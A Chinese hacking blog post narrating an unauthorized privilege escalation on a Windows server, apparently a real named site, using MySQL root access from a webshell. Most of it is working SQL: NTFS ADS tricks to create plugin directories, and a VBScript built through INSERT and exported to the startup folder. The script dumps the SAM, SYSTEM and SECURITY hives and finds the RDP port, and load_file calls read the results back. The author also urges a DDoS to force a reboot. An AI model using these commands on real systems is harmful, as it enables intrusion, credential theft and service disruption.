鸡肋提权之变态root利用-LMLPHP

你急有毛用,我电脑没带,怎么搞?
联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽,

鸡肋提权之变态root利用-LMLPHP

由于我无法电脑操作,我又给他提供了一些思路,php无法调用ws组建,试试asp,后来听火龙瘠薄说整个服务器全都是phpweb的站点,。。提权陷入僵局。

后来喝了一杯82年的乐事冷静了一下,最后一招,写启动。。

于是让adminlm测试,他不知道再搞些什么东西,也听不懂我的思路,

鸡肋提权之变态root利用-LMLPHP

鸡肋提权之变态root利用-LMLPHP

鸡肋提权之变态root利用-LMLPHP

。。。。我还是自己来吧。。。。

找个语文课的时间,啪。。,飞出来了。。。

鸡肋提权之变态root利用-LMLPHP

直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录,需要用NTFS ads 引流来创建

  1.  
    1.  select @@basedir;   
    2.  
    3. //查找到mysql的目录 这里回显:D:\Huweishen.com\PHPWEB\MySQL Server 5.5
    4.  
    5. select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';   
    6.  
    7. //利用NTFS ADS创建lib目录  注意路径的替换。还有\换成\\  
    8.  
    9. select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
    10.  
    11. //利用NTFS ADS创建plugin目录

鸡肋提权之变态root利用-LMLPHP

这样啊  adminlm来的时候已经创建了  已经存在目录

  1.  
    1. File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists

导出试试看  估计不行  要不然adminlm、早拿下了

鸡肋提权之变态root利用-LMLPHP

mof我也不测试哦了,估计也是不行  因为这个鸟东西在,护卫神!!

鸡肋提权之变态root利用-LMLPHP

写启动项添加用户我也不测试了  万一上面有什么防护软件直接就阻止了

思路还有的,三行代码导hash,破解。ok

然后有人不服,你破解出来又如何,端口你知道????

哦,我不知道,但是我还是可以查。。。看操作吧

建表:

  1.  
    1. create table binghe (cmd text);

好了,我们创建了一个新的表,表名为binghe,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容

  1.  
    1. insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );

插入三行代码导出hash,

Code1=reg save hklm\sam sam.hive
code2=reg save hklm\system ystem.hive
code3=reg save hklm\security security.hive

  1.  
    1. insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );

三行代码运行之后会在启动目录生成三个文件,到时候loadfile读取,然后本地破解就可以获得管理密码

那么如何获得端口号??

呵呵,这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt

  1.  
    1. insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
    2.  
    3. 注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

再来,查询端口服务,并将结果追加写入(>>)shell目录的binghe.txt

  1.  
    1. insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) ");
    2.  
    3. 注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

看看我在shell上面的实际操作

鸡肋提权之变态root利用-LMLPHP

s这里打了性感的马赛克

鸡肋提权之变态root利用-LMLPHP

鸡肋提权之变态root利用-LMLPHP

鸡肋提权之变态root利用-LMLPHP
来查一下是不是写进去了??

  1.  
    1. select * from binghe;

如图,哈哈,不错

鸡肋提权之变态root利用-LMLPHP

好了,一切完毕  开始导出到启动项

  1.  
    1. select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";

再来loadfile看看
应该写进去了

鸡肋提权之变态root利用-LMLPHP

接下来的事就不是我的事情了

@火龙,交给你,你不是说你的朋友有多少多少G纯流量吗,狠狠地ddos,打到管理员他喊叔叔也不停,然后他就去重启服务器了,然后。。你懂得!

还是说下吧,重启之后,按照我的预想,会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt(内容包括termservice进程服务的pid和端口细节及对应pid,会提权的人都知道这两个pid对比就会获得终端端口号)  ,另外在启动目录会生成三个hash的文件,到时候你来找我,我去loadfile他的hash,命令如下

  1.  
    1. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
    2.  
    3.  
    4.  
    5. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
    6.  
    7.  
    8.  
    9. select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
    10.  
    11.  
    12.  
    13. 注:file1\file2\file3 分别为三个hash文件

额,这是最后的思路了,比较鸡肋。。。

静待重启吧,时间问题。。

另外谢谢adminlm大牛帮我测试,好机油,下次去找你玩哈

另外说一句,谁对我好我对谁好,火龙大哥帮过我不少,他有问题我当倾力解决。。。不说了,我该回去了  卧槽  还要FQ进去。。别举报我!

05-18 11:11